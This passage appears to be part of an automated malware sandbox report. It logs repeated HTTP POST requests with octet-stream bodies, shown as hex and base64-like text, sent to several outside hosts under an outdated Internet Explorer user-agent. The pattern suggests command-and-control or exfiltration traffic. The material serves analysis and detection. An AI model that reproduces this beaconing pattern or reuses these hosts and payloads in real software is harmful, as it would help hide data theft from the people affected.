68 70 48 31 42 6e 53 56 44 6a 64 52 69 73 45 43 38 64 6e 56 6c 68 4d 46 47 4f 31 39 41 46 46 5a 57 4e 73 75 42 31 2f 61 46 6f 45 72 71 53 31 59 6a 66 49 43 6d 51 74 6e 6d 6e 54 42 6d 66 48 58 2b 34 71 38 73 73 2f 76 4f 47 37 54 41 77 2b 73 78 41 6a 32 51 2b 4b 44 41 64 53 52 45 74 2f 4f 73 4c 70 6a 74 4f 33 36 2f 62 4b 4c 58 58 4a 57 31 2b 73 62 78 5a 46 6e 61 34 4c 54 79 75 43 52 56 7a 4f 51 57 2f 41 63 74 71 55 66 5a 4d 58 53 6d 34 37 4a 37 6f 54 48 34 66 62 32 58 36 67 67 56 55 42 53 4c 70 52 50 6d 76 4f 44 4a 56 68 79 65 76 66 43 36 45 7a 54 79 33 46 44 59 56 78 72 78 61 69 47 73 42 34 39 51 74 36 4b 71 46 4d 73 79 52 33 4d 37 62 4a 77 44 54 6e 75 57 6d 73 71 61 77 73 36 64 70 74 4d 55 41 33 6c 56 4e 55 32 6f 6b 6c 69 57 59 6d 4f 54 2f 73 43 41 57 49 42 2b 48 37 4c 6c 4c 76 79 61 30 44 52 64 61 6d 4c 52 43 2f 66 5a 59 49 30 34 43 52 6b 76 34 2f 63 4a 76 53 35 46 4a 58 4d 2b 45 42 46 61 68 68 43 67 62 38 6b 63 44 54 44 43 73 72 4f 57 46 55 70 32 31 51 3d 3d Data Ascii: tNTGzduGy2kUiaB28g7j3sThCnBhavqBP/ZzrlA5RMCmJpclF9PwlZyNeGSbDS+sQcLwdYVR/A4FoFTQ1VlnAceQXgjEjRfzR/R11mYIsauzvspZ64IDtRq9rCHyVqFjFdaE6+ZBSUmWFjvnoBZASxk1xZas1q3+rWVI94w/cMxoDari1atf+hLpCz4dJ2beAB2xXsAx9ENb5XJLVc3kRgusla7ewPK5nZSihDVhpH1BnSVDjdRisEC8dnVlhMFGO19AFFZWNsuB1/aFoErqS1YjfICmQtnmnTBmfHX+4q8ss/vOG7TAw+sxAj2Q+KDAdSREt/OsLpjtO36/bKLXXJW1+sbxZFna4LTyuCRVzOQW/ActqUfZMXSm47J7oTH4fb2X6ggVUBSLpRPmvODJVhyevfC6EzTy3FDYVxrxaiGsB49Qt6KqFMsyR3M7bJwDTnuWmsqaws6dptMUA3lVNU2okliWYmOT/sCAWIB+H7LlLvya0DRdamLRC/fZYI04CRkv4/cJvS5FJXM+EBFahhCgb8kcDTDCsrOWFUp21Q==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 4f 50 53 43 57 35 76 42 34 47 6c 37 78 50 54 63 73 6f 6f 66 45 6f 53 75 4b 7a 6b 68 33 47 42 6a 2f 33 77 38 5a 35 67 41 6b 66 4c 54 4e 59 31 46 41 48 4f 52 44 42 7a 61 41 46 77 6e 6a 78 64 66 30 30 4c 54 54 6b 68 41 4c 58 2b 33 49 64 31 45 34 47 39 2f 43 44 69 62 6f 7a 30 73 49 4e 58 75 34 6c 66 33 32 4f 44 36 2f 30 4d 4c 73 4d 39 74 35 78 66 44 49 76 6e 48 54 4b 6b 7a 6b 53 5a 72 74 67 47 66 57 58 71 7a 2b 53 6f 36 71 4c 49 71 56 71 7a 4b 6f 31 61 6c 69 39 38 75 45 30 37 45 6f 52 71 37 4f 38 47 6d 42 48 37 4a 65 56 36 49 37 38 54 70 32 66 77 53 49 51 38 72 30 5a 62 4d 54 70 54 41 4a 4e 56 43 46 33 56 4f 36 6a 72 6b 33 41 7a 53 79 6a 35 79 38 72 47 2f 57 47 39 79 51 52 76 63 2b 75 33 57 68 49 48 39 58 47 59 59 35 4d 31 52 46 45 69 34 6b 54 30 57 37 50 57 55 62 49 41 6f 47 6b 43 4d 6b 7a 39 61 55 4a 54 6d 56 2f 51 54 30 76 59 42 64 4b 44 4e 6f 42 43 68 38 39 51 5a 56 48 79 39 66 51 78 6f 44 75 4a 51 79 42 55 34 5a 51 4c 77 2b 6e 31 44 71 59 61 65 34 52 77 48 65 31 43 45 44 4f 72 43 51 70 34 65 75 42 73 75 33 75 37 77 54 53 44 35 51 75 4e 77 2f 48 51 55 2f 4b 36 72 62 73 30 74 65 33 33 63 35 61 39 66 4c 66 75 43 69 6e 57 77 44 6a 69 70 6b 52 45 41 4d 45 74 41 41 35 58 54 44 79 5a 63 61 2f 68 55 52 4b 56 72 62 69 76 70 78 72 59 65 55 38 73 67 68 53 74 78 65 38 76 4b 42 7a 38 61 4e 36 4e 42 54 52 34 72 69 75 37 4e 5a 6e 67 54 41 4a 6d 72 4a 76 51 76 69 4c 76 52 68 74 33 6b 34 32 47 59 6e 66 31 34 77 78 77 48 50 74 66 4a 31 31 67 4d 30 6b 71 7a 6a 5a 6e 38 66 57 63 72 4c 49 4e 45 6e 68 37 35 4e 6d 44 39 59 6e 5a 44 72 2f 68 36 34 73 77 62 67 74 4f 43 6a 6b 4f 30 31 67 31 64 47 75 43 35 62 73 71 6d 41 59 4a 59 51 51 66 59 4b 6c 41 72 53 44 46 55 7a 4d 78 4d 4e 6b 5a 7a 4d 7a 37 34 78 44 55 71 58 31 77 46 36 56 70 73 52 76 71 36 52 64 34 6b 50 5a 6f 49 6f 67 3d 3d Data Ascii: OPSCW5vB4Gl7xPTcsoofEoSuKzkh3GBj/3w8Z5gAkfLTNY1FAHORDBzaAFwnjxdf00LTTkhALX+3Id1E4G9/CDiboz0sINXu4lf32OD6/0MLsM9t5xfDIvnHTKkzkSZrtgGfWXqz+So6qLIqVqzKo1ali98uE07EoRq7O8GmBH7JeV6I78Tp2fwSIQ8r0ZbMTpTAJNVCF3VO6jrk3AzSyj5y8rG/WG9yQRvc+u3WhIH9XGYY5M1RFEi4kT0W7PWUbIAoGkCMkz9aUJTmV/QT0vYBdKDNoBCh89QZVHy9fQxoDuJQyBU4ZQLw+n1DqYae4RwHe1CEDOrCQp4euBsu3u7wTSD5QuNw/HQU/K6rbs0te33c5a9fLfuCinWwDjipkREAMEtAA5XTDyZca/hURKVrbivpxrYeU8sghStxe8vKBz8aN6NBTR4riu7NZngTAJmrJvQviLvRht3k42GYnf14wxwHPtfJ11gM0kqzjZn8fWcrLINEnh75NmD9YnZDr/h64swbgtOCjkO01g1dGuC5bsqmAYJYQQfYKlArSDFUzMxMNkZzMz74xDUqX1wF6VpsRvq6Rd4kPZoIog==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 74 4e 54 47 7a 64 75 47 79 32 6b 55 69 61 42 32 38 67 37 6a 33 73 54 68 43 6e 42 68 61 76 71 42 50 2f 5a 7a 72 6c 41 35 52 4d 43 6d 4a 70 63 6c 46 39 50 77 6c 5a 79 4e 65 47 53 62 44 53 2b 73 51 63 4c 77 64 59 56 52 2f 41 34 46 6f 46 54 51 31 56 6c 6e 41 63 65 51 58 67 6a 45 6a 52 66 7a 52 2f 52 31 31 6d 59 49 73 61 75 7a 76 73 70 5a 36 34 49 44 74 52 71 39 72 43 48 79 56 71 46 6a 46 64 61 45 36 2b 5a 42 53 55 6d 57 46 6a 76 6e 6f 42 5a 41 53 78 6b 31 78 5a 61 73 31 71 33 2b 72 57 56 49 39 34 77 2f 63 4d 78 6f 44 61 72 69 31 61 74 66 2b 68 4c 70 43 7a 34 64 4a 32 62 65 41 42 32 78 58 73 41 78 39 45 4e 62 35 58 4a 4c 56 63 33 6b 52 67 75 73 6c 61 37 65 77 50 4b 35 6e 5a 53 69 68 44 56 68 70 48 31 42 6e 53 56 44 6a 64 52 69 73 45 43 38 64 6e 56 6c 68 4d 46 47 4f 31 39 41 46 46 5a 57 4e 73 75 42 31 2f 61 46 6f 45 72 71 53 31 59 6a 66 49 43 6d 51 74 6e 6d 6e 54 42 6d 66 48 58 2b 34 71 38 73 73 2f 76 4f 47 37 54 41 77 2b 73 78 41 6a 32 51 2b 4b 44 41 64 53 52 45 74 2f 4f 73 4c 70 6a 74 4f 33 36 2f 62 4b 4c 58 58 4a 57 31 2b 73 62 78 5a 46 6e 61 34 4c 54 79 75 43 52 56 7a 4f 51 57 2f 41 63 74 71 55 66 5a 4d 58 53 6d 34 37 4a 37 6f 54 48 34 66 62 32 58 36 67 67 56 55 42 53 4c 70 52 50 6d 76 4f 44 4a 56 68 79 65 76 66 43 36 45 7a 54 79 33 46 44 59 56 78 72 78 61 69 47 73 42 34 39 51 74 36 4b 71 46 4d 73 79 52 33 4d 37 62 4a 77 44 54 6e 75 57 6d 73 71 61 77 73 36 64 70 74 4d 55 41 33 6c 56 4e 55 32 6f 6b 6c 69 57 59 6d 4f 54 2f 73 43 41 57 49 42 2b 48 37 4c 6c 4c 76 79 61 30 44 52 64 61 6d 4c 52 43 2f 66 5a 59 49 30 34 43 52 6b 76 34 2f 63 4a 76 53 35 46 4a 58 4d 2b 45 42 46 61 68 68 43 67 62 38 6b 63 44 54 44 43 73 72 4f 57 46 55 70 32 31 51 3d 3d Data Ascii: tNTGzduGy2kUiaB28g7j3sThCnBhavqBP/ZzrlA5RMCmJpclF9PwlZyNeGSbDS+sQcLwdYVR/A4FoFTQ1VlnAceQXgjEjRfzR/R11mYIsauzvspZ64IDtRq9rCHyVqFjFdaE6+ZBSUmWFjvnoBZASxk1xZas1q3+rWVI94w/cMxoDari1atf+hLpCz4dJ2beAB2xXsAx9ENb5XJLVc3kRgusla7ewPK5nZSihDVhpH1BnSVDjdRisEC8dnVlhMFGO19AFFZWNsuB1/aFoErqS1YjfICmQtnmnTBmfHX+4q8ss/vOG7TAw+sxAj2Q+KDAdSREt/OsLpjtO36/bKLXXJW1+sbxZFna4LTyuCRVzOQW/ActqUfZMXSm47J7oTH4fb2X6ggVUBSLpRPmvODJVhyevfC6EzTy3FDYVxrxaiGsB49Qt6KqFMsyR3M7bJwDTnuWmsqaws6dptMUA3lVNU2okliWYmOT/sCAWIB+H7LlLvya0DRdamLRC/fZYI04CRkv4/cJvS5FJXM+EBFahhCgb8kcDTDCsrOWFUp21Q==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 52 77 51 62 46 79 58 5a 35 6d 6d 76 73 74 76 56 7a 4c 68 4a 7a 4a 37 4d 31 76 6c 7a 6f 7a 47 77 4b 52 41 6e 35 42 66 4c 2b 4d 70 71 73 73 38 56 78 51 34 53 76 6c 45 30 56 74 53 4c 2f 61 57 51 46 61 69 6c 5a 37 62 62 39 4f 6f 49 53 6f 6b 6b 45 31 55 6f 67 69 51 51 51 53 43 70 4f 35 45 68 70 4c 30 33 50 68 78 77 31 50 63 59 31 55 41 4a 70 39 36 53 65 64 6b 70 53 73 68 78 53 65 71 32 41 47 6e 50 59 2f 47 6d 42 76 58 64 4a 7a 74 70 6a 2f 6d 48 30 69 56 64 63 66 58 46 36 48 33 6f 7a 57 73 63 79 53 57 76 4f 51 79 72 67 65 56 59 67 77 59 6a 43 45 6c 30 71 52 6e 43 4c 66 4c 57 32 67 72 62 38 34 6b 66 68 61 47 38 33 6f 70 56 55 34 34 45 75 2b 76 2b 4c 30 47 41 45 6a 65 45 4e 61 46 64 66 75 77 4c 75 67 32 57 2f 51 48 76 69 64 41 79 57 6f 41 4b 35 74 47 4a 4d 43 2f 4b 52 64 38 31 43 78 33 6c 42 71 7a 47 52 65 51 42 75 38 70 67 4a 53 44 32 43 58 76 64 42 6f 6b 6f 6b 6e 67 33 57 44 51 66 4e 44 53 2f 48 79 6f 71 30 57 71 79 66 54 58 6c 2f 4b 67 37 6d 4b 79 44 41 44 2b 4c 65 6e 52 39 2f 64 33 6a 66 4b 42 4f 35 79 55 6f 65 6c 71 6c 2b 4a 49 6e 78 47 6f 49 62 35 6e 47 43 2b 54 31 70 63 73 35 79 63 6b 37 66 4c 4b 69 31 76 6d 63 6a 71 2b 74 73 4f 47 75 62 6a 59 34 6a 70 43 7a 59 47 62 6e 78 68 6a 6d 58 47 4c 6e 47 36 4f 35 58 59 75 79 78 30 76 52 65 7a 5a 61 2f 62 48 5a 7a 71 64 4e 5a 75 6a 77 58 4d 58 61 76 73 4d 52 6d 4c 6e 35 6e 47 70 7a 77 49 66 2f 4c 6e 41 34 2b 4b 77 55 58 4c 75 32 4c 70 44 57 52 54 50 76 5a 55 34 41 43 39 6e 4a 42 66 33 66 35 76 43 6d 35 35 31 30 7a 31 7a 46 66 62 38 2f 41 62 69 72 61 37 6b 6b 54 65 72 32 57 50 62 58 77 36 35 77 6c 56 61 4e 70 7a 77 3d Data Ascii: RwQbFyXZ5mmvstvVzLhJzJ7M1vlzozGwKRAn5BfL+Mpqss8VxQ4SvlE0VtSL/aWQFailZ7bb9OoISokkE1UogiQQQSCpO5EhpL03Phxw1PcY1UAJp96SedkpSshxSeq2AGnPY/GmBvXdJztpj/mH0iVdcfXF6H3ozWscySWvOQyrgeVYgwYjCEl0qRnCLfLW2grb84kfhaG83opVU44Eu+v+L0GAEjeENaFdfuwLug2W/QHvidAyWoAK5tGJMC/KRd81Cx3lBqzGReQBu8pgJSD2CXvdBokokng3WDQfNDS/Hyoq0WqyfTXl/Kg7mKyDAD+LenR9/d3jfKBO5yUoelql+JInxGoIb5nGC+T1pcs5yck7fLKi1vmcjq+tsOGubjY4jpCzYGbnxhjmXGLnG6O5XYuyx0vRezZa/bHZzqdNZujwXMXavsMRmLn5nGpzwIf/LnA4+KwUXLu2LpDWRTPvZU4AC9nJBf3f5vCm5510z1zFfb8/Abira7kkTer2WPbXw65wlVaNpzw=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 52 77 51 62 46 79 58 5a 35 6d 6d 76 73 74 76 56 7a 4c 68 4a 7a 4a 37 4d 31 76 6c 7a 6f 7a 47 77 4b 52 41 6e 35 42 66 4c 2b 4d 70 71 73 73 38 56 78 51 34 53 76 6c 45 30 56 74 53 4c 2f 61 57 51 46 61 69 6c 5a 37 62 62 39 4f 6f 49 53 6f 6b 6b 45 31 55 6f 67 69 51 51 51 53 43 70 4f 35 45 68 70 4c 30 33 50 68 78 77 31 50 63 59 31 55 41 4a 70 39 36 53 65 64 6b 70 53 73 68 78 53 65 71 32 41 47 6e 50 59 2f 47 6d 42 76 58 64 4a 7a 74 70 6a 2f 6d 48 30 69 56 64 63 66 58 46 36 48 33 6f 7a 57 73 63 79 53 57 76 4f 51 79 72 67 65 56 59 67 77 59 6a 43 45 6c 30 71 52 6e 43 4c 66 4c 57 32 67 72 62 38 34 6b 66 68 61 47 38 33 6f 70 56 55 34 34 45 75 2b 76 2b 4c 30 47 41 45 6a 65 45 4e 61 46 64 66 75 77 4c 75 67 32 57 2f 51 48 76 69 64 41 79 57 6f 41 4b 35 74 47 4a 4d 43 2f 4b 52 64 38 31 43 78 33 6c 42 71 7a 47 52 65 51 42 75 38 70 67 4a 53 44 32 43 58 76 64 42 6f 6b 6f 6b 6e 67 33 57 44 51 66 4e 44 53 2f 48 79 6f 71 30 57 71 79 66 54 58 6c 2f 4b 67 37 6d 4b 79 44 41 44 2b 4c 65 6e 52 39 2f 64 33 6a 66 4b 42 4f 35 79 55 6f 65 6c 71 6c 2b 4a 49 6e 78 47 6f 49 62 35 6e 47 43 2b 54 31 70 63 73 35 79 63 6b 37 66 4c 4b 69 31 76 6d 63 6a 71 2b 74 73 4f 47 75 62 6a 59 34 6a 70 43 7a 59 47 62 6e 78 68 6a 6d 58 47 4c 6e 47 36 4f 35 58 59 75 79 78 30 76 52 65 7a 5a 61 2f 62 48 5a 7a 71 64 4e 5a 75 6a 77 58 4d 58 61 76 73 4d 52 6d 4c 6e 35 6e 47 70 7a 77 49 66 2f 4c 6e 41 34 2b 4b 77 55 58 4c 75 32 4c 70 44 57 52 54 50 76 5a 55 34 41 43 39 6e 4a 42 66 33 66 35 76 43 6d 35 35 31 30 7a 31 7a 46 66 62 38 2f 41 62 69 72 61 37 6b 6b 54 65 72 32 57 50 62 58 77 36 35 77 6c 56 61 4e 70 7a 77 3d Data Ascii: RwQbFyXZ5mmvstvVzLhJzJ7M1vlzozGwKRAn5BfL+Mpqss8VxQ4SvlE0VtSL/aWQFailZ7bb9OoISokkE1UogiQQQSCpO5EhpL03Phxw1PcY1UAJp96SedkpSshxSeq2AGnPY/GmBvXdJztpj/mH0iVdcfXF6H3ozWscySWvOQyrgeVYgwYjCEl0qRnCLfLW2grb84kfhaG83opVU44Eu+v+L0GAEjeENaFdfuwLug2W/QHvidAyWoAK5tGJMC/KRd81Cx3lBqzGReQBu8pgJSD2CXvdBokokng3WDQfNDS/Hyoq0WqyfTXl/Kg7mKyDAD+LenR9/d3jfKBO5yUoelql+JInxGoIb5nGC+T1pcs5yck7fLKi1vmcjq+tsOGubjY4jpCzYGbnxhjmXGLnG6O5XYuyx0vRezZa/bHZzqdNZujwXMXavsMRmLn5nGpzwIf/LnA4+KwUXLu2LpDWRTPvZU4AC9nJBf3f5vCm5510z1zFfb8/Abira7kkTer2WPbXw65wlVaNpzw=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 4f 50 53 43 57 35 76 42 34 47 6c 37 78 50 54 63 73 6f 6f 66 45 6f 53 75 4b 7a 6b 68 33 47 42 6a 2f 33 77 38 5a 35 67 41 6b 66 4c 54 4e 59 31 46 41 48 4f 52 44 42 7a 61 41 46 77 6e 6a 78 64 66 30 30 4c 54 54 6b 68 41 4c 58 2b 33 49 64 31 45 34 47 39 2f 43 44 69 62 6f 7a 30 73 49 4e 58 75 34 6c 66 33 32 4f 44 36 2f 30 4d 4c 73 4d 39 74 35 78 66 44 49 76 6e 48 54 4b 6b 7a 6b 53 5a 72 74 67 47 66 57 58 71 7a 2b 53 6f 36 71 4c 49 71 56 71 7a 4b 6f 31 61 6c 69 39 38 75 45 30 37 45 6f 52 71 37 4f 38 47 6d 42 48 37 4a 65 56 36 49 37 38 54 70 32 66 77 53 49 51 38 72 30 5a 62 4d 54 70 54 41 4a 4e 56 43 46 33 56 4f 36 6a 72 6b 33 41 7a 53 79 6a 35 79 38 72 47 2f 57 47 39 79 51 52 76 63 2b 75 33 57 68 49 48 39 58 47 59 59 35 4d 31 52 46 45 69 34 6b 54 30 57 37 50 57 55 62 49 41 6f 47 6b 43 4d 6b 7a 39 61 55 4a 54 6d 56 2f 51 54 30 76 59 42 64 4b 44 4e 6f 42 43 68 38 39 51 5a 56 48 79 39 66 51 78 6f 44 75 4a 51 79 42 55 34 5a 51 4c 77 2b 6e 31 44 71 59 61 65 34 52 77 48 65 31 43 45 44 4f 72 43 51 70 34 65 75 42 73 75 33 75 37 77 54 53 44 35 51 75 4e 77 2f 48 51 55 2f 4b 36 72 62 73 30 74 65 33 33 63 35 61 39 66 4c 66 75 43 69 6e 57 77 44 6a 69 70 6b 52 45 41 4d 45 74 41 41 35 58 54 44 79 5a 63 61 2f 68 55 52 4b 56 72 62 69 76 70 78 72 59 65 55 38 73 67 68 53 74 78 65 38 76 4b 42 7a 38 61 4e 36 4e 42 54 52 34 72 69 75 37 4e 5a 6e 67 54 41 4a 6d 72 4a 76 51 76 69 4c 76 52 68 74 33 6b 34 32 47 59 6e 66 31 34 77 78 77 48 50 74 66 4a 31 31 67 4d 30 6b 71 7a 6a 5a 6e 38 66 57 63 72 4c 49 4e 45 6e 68 37 35 4e 6d 44 39 59 6e 5a 44 72 2f 68 36 34 73 77 62 67 74 4f 43 6a 6b 4f 30 31 67 31 64 47 75 43 35 62 73 71 6d 41 59 4a 59 51 51 66 59 4b 6c 41 72 53 44 46 55 7a 4d 78 4d 4e 6b 5a 7a 4d 7a 37 34 78 44 55 71 58 31 77 46 36 56 70 73 52 76 71 36 52 64 34 6b 50 5a 6f 49 6f 67 3d 3d Data Ascii: OPSCW5vB4Gl7xPTcsoofEoSuKzkh3GBj/3w8Z5gAkfLTNY1FAHORDBzaAFwnjxdf00LTTkhALX+3Id1E4G9/CDiboz0sINXu4lf32OD6/0MLsM9t5xfDIvnHTKkzkSZrtgGfWXqz+So6qLIqVqzKo1ali98uE07EoRq7O8GmBH7JeV6I78Tp2fwSIQ8r0ZbMTpTAJNVCF3VO6jrk3AzSyj5y8rG/WG9yQRvc+u3WhIH9XGYY5M1RFEi4kT0W7PWUbIAoGkCMkz9aUJTmV/QT0vYBdKDNoBCh89QZVHy9fQxoDuJQyBU4ZQLw+n1DqYae4RwHe1CEDOrCQp4euBsu3u7wTSD5QuNw/HQU/K6rbs0te33c5a9fLfuCinWwDjipkREAMEtAA5XTDyZca/hURKVrbivpxrYeU8sghStxe8vKBz8aN6NBTR4riu7NZngTAJmrJvQviLvRht3k42GYnf14wxwHPtfJ11gM0kqzjZn8fWcrLINEnh75NmD9YnZDr/h64swbgtOCjkO01g1dGuC5bsqmAYJYQQfYKlArSDFUzMxMNkZzMz74xDUqX1wF6VpsRvq6Rd4kPZoIog==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 4c 2b 54 64 4a 52 6d 6b 37 32 6d 4b 37 5a 57 37 4b 44 35 74 48 37 4a 37 39 48 6c 33 47 39 47 34 58 58 43 59 57 5a 6b 4d 58 75 69 31 51 41 6c 36 56 74 2f 76 69 34 38 72 79 53 74 64 39 41 51 6c 35 51 6f 67 33 70 4a 55 2b 58 61 54 38 64 76 68 67 73 7a 37 70 63 79 50 63 63 4f 32 47 33 4e 4d 50 6a 5a 46 39 49 64 66 6b 37 6c 62 6a 54 63 32 38 59 6f 79 2b 79 66 5a 76 61 67 4d 53 6c 42 51 2f 72 61 37 76 75 64 59 4e 4d 37 68 33 44 68 72 78 41 51 47 32 34 37 54 76 79 30 44 61 66 68 54 6f 51 31 41 5a 74 4a 35 58 4d 61 42 79 76 52 73 6e 52 76 53 56 4d 79 47 4e 72 47 6c 54 6e 6e 37 6a 69 37 6c 6b 70 72 77 46 55 79 6d 59 6f 44 46 42 57 6d 55 33 77 76 79 44 41 79 45 62 65 4e 7a 6c 6e 2b 70 68 54 45 46 41 35 36 30 2b 6a 53 57 4f 74 43 6c 2f 47 56 57 69 76 46 6f 4f 36 68 76 79 2b 52 6b 36 4f 61 31 63 59 65 46 4f 6c 51 6c 75 30 70 43 42 64 7a 42 79 53 42 65 50 68 44 6a 43 57 53 53 4f 43 65 4e 4c 4c 54 7a 74 59 39 64 30 63 42 4f 36 54 35 37 32 58 6d 4b 43 59 6b 43 4e 36 6e 64 55 71 68 6f 70 4e 6b 72 73 42 38 2b 4a 4a 6e 7a 32 65 30 74 6f 33 35 45 62 71 53 32 51 64 78 5a 4b 63 62 34 55 6a 6f 7a 78 50 6a 53 52 4c 42 70 6b 78 66 2b 38 72 77 38 35 5a 4d 67 4d 71 62 63 46 49 53 72 33 2f 70 36 56 45 72 36 39 76 37 56 77 49 35 36 32 53 59 44 4c 78 65 42 5a 61 53 48 48 46 35 6f 33 2b 48 6e 33 47 6b 56 4c 4c 39 4e 77 4f 71 77 73 70 57 46 33 2b 43 69 5a 2b 42 48 46 55 61 75 53 31 39 36 79 70 69 43 37 76 54 6b 64 6c 72 34 37 57 71 2f 4d 54 59 58 51 63 37 30 48 35 43 48 68 4a 55 75 64 34 43 55 46 56 30 4c 77 39 4d 47 33 78 6b 54 4a 4c 6a 76 75 64 5a 75 6f 53 4b 31 37 4e 39 42 6d 6b 4f 6d 47 4f 59 64 33 5a 70 64 39 4a 36 39 33 54 5a 44 74 65 68 4f 76 79 52 45 37 31 78 4e 39 51 63 4f 74 79 36 72 76 6e 56 7a 68 37 67 6d 44 6a 6f 48 75 59 4e 78 4a 33 55 3d Data Ascii: L+TdJRmk72mK7ZW7KD5tH7J79Hl3G9G4XXCYWZkMXui1QAl6Vt/vi48ryStd9AQl5Qog3pJU+XaT8dvhgsz7pcyPccO2G3NMPjZF9Idfk7lbjTc28Yoy+yfZvagMSlBQ/ra7vudYNM7h3DhrxAQG247Tvy0DafhToQ1AZtJ5XMaByvRsnRvSVMyGNrGlTnn7ji7lkprwFUymYoDFBWmU3wvyDAyEbeNzln+phTEFA560+jSWOtCl/GVWivFoO6hvy+Rk6Oa1cYeFOlQlu0pCBdzBySBePhDjCWSSOCeNLLTztY9d0cBO6T572XmKCYkCN6ndUqhopNkrsB8+JJnz2e0to35EbqS2QdxZKcb4UjozxPjSRLBpkxf+8rw85ZMgMqbcFISr3/p6VEr69v7VwI562SYDLxeBZaSHHF5o3+Hn3GkVLL9NwOqwspWF3+CiZ+BHFUauS196ypiC7vTkdlr47Wq/MTYXQc70H5CHhJUud4CUFV0Lw9MG3xkTJLjvudZuoSK17N9BmkOmGOYd3Zpd9J693TZDtehOvyRE71xN9QcOty6rvnVzh7gmDjoHuYNxJ3U=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 4c 2b 54 64 4a 52 6d 6b 37 32 6d 4b 37 5a 57 37 4b 44 35 74 48 37 4a 37 39 48 6c 33 47 39 47 34 58 58 43 59 57 5a 6b 4d 58 75 69 31 51 41 6c 36 56 74 2f 76 69 34 38 72 79 53 74 64 39 41 51 6c 35 51 6f 67 33 70 4a 55 2b 58 61 54 38 64 76 68 67 73 7a 37 70 63 79 50 63 63 4f 32 47 33 4e 4d 50 6a 5a 46 39 49 64 66 6b 37 6c 62 6a 54 63 32 38 59 6f 79 2b 79 66 5a 76 61 67 4d 53 6c 42 51 2f 72 61 37 76 75 64 59 4e 4d 37 68 33 44 68 72 78 41 51 47 32 34 37 54 76 79 30 44 61 66 68 54 6f 51 31 41 5a 74 4a 35 58 4d 61 42 79 76 52 73 6e 52 76 53 56 4d 79 47 4e 72 47 6c 54 6e 6e 37 6a 69 37 6c 6b 70 72 77 46 55 79 6d 59 6f 44 46 42 57 6d 55 33 77 76 79 44 41 79 45 62 65 4e 7a 6c 6e 2b 70 68 54 45 46 41 35 36 30 2b 6a 53 57 4f 74 43 6c 2f 47 56 57 69 76 46 6f 4f 36 68 76 79 2b 52 6b 36 4f 61 31 63 59 65 46 4f 6c 51 6c 75 30 70 43 42 64 7a 42 79 53 42 65 50 68 44 6a 43 57 53 53 4f 43 65 4e 4c 4c 54 7a 74 59 39 64 30 63 42 4f 36 54 35 37 32 58 6d 4b 43 59 6b 43 4e 36 6e 64 55 71 68 6f 70 4e 6b 72 73 42 38 2b 4a 4a 6e 7a 32 65 30 74 6f 33 35 45 62 71 53 32 51 64 78 5a 4b 63 62 34 55 6a 6f 7a 78 50 6a 53 52 4c 42 70 6b 78 66 2b 38 72 77 38 35 5a 4d 67 4d 71 62 63 46 49 53 72 33 2f 70 36 56 45 72 36 39 76 37 56 77 49 35 36 32 53 59 44 4c 78 65 42 5a 61 53 48 48 46 35 6f 33 2b 48 6e 33 47 6b 56 4c 4c 39 4e 77 4f 71 77 73 70 57 46 33 2b 43 69 5a 2b 42 48 46 55 61 75 53 31 39 36 79 70 69 43 37 76 54 6b 64 6c 72 34 37 57 71 2f 4d 54 59 58 51 63 37 30 48 35 43 48 68 4a 55 75 64 34 43 55 46 56 30 4c 77 39 4d 47 33 78 6b 54 4a 4c 6a 76 75 64 5a 75 6f 53 4b 31 37 4e 39 42 6d 6b 4f 6d 47 4f 59 64 33 5a 70 64 39 4a 36 39 33 54 5a 44 74 65 68 4f 76 79 52 45 37 31 78 4e 39 51 63 4f 74 79 36 72 76 6e 56 7a 68 37 67 6d 44 6a 6f 48 75 59 4e 78 4a 33 55 3d Data Ascii: L+TdJRmk72mK7ZW7KD5tH7J79Hl3G9G4XXCYWZkMXui1QAl6Vt/vi48ryStd9AQl5Qog3pJU+XaT8dvhgsz7pcyPccO2G3NMPjZF9Idfk7lbjTc28Yoy+yfZvagMSlBQ/ra7vudYNM7h3DhrxAQG247Tvy0DafhToQ1AZtJ5XMaByvRsnRvSVMyGNrGlTnn7ji7lkprwFUymYoDFBWmU3wvyDAyEbeNzln+phTEFA560+jSWOtCl/GVWivFoO6hvy+Rk6Oa1cYeFOlQlu0pCBdzBySBePhDjCWSSOCeNLLTztY9d0cBO6T572XmKCYkCN6ndUqhopNkrsB8+JJnz2e0to35EbqS2QdxZKcb4UjozxPjSRLBpkxf+8rw85ZMgMqbcFISr3/p6VEr69v7VwI562SYDLxeBZaSHHF5o3+Hn3GkVLL9NwOqwspWF3+CiZ+BHFUauS196ypiC7vTkdlr47Wq/MTYXQc70H5CHhJUud4CUFV0Lw9MG3xkTJLjvudZuoSK17N9BmkOmGOYd3Zpd9J693TZDtehOvyRE71xN9QcOty6rvnVzh7gmDjoHuYNxJ3U=
